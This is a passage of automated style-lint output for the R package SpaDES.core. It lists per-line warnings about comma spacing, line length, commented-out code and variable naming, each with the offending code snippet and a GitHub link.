^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/38c1b41869d0a28b43927694582bf539385a33cc/R/POM.R#L186) 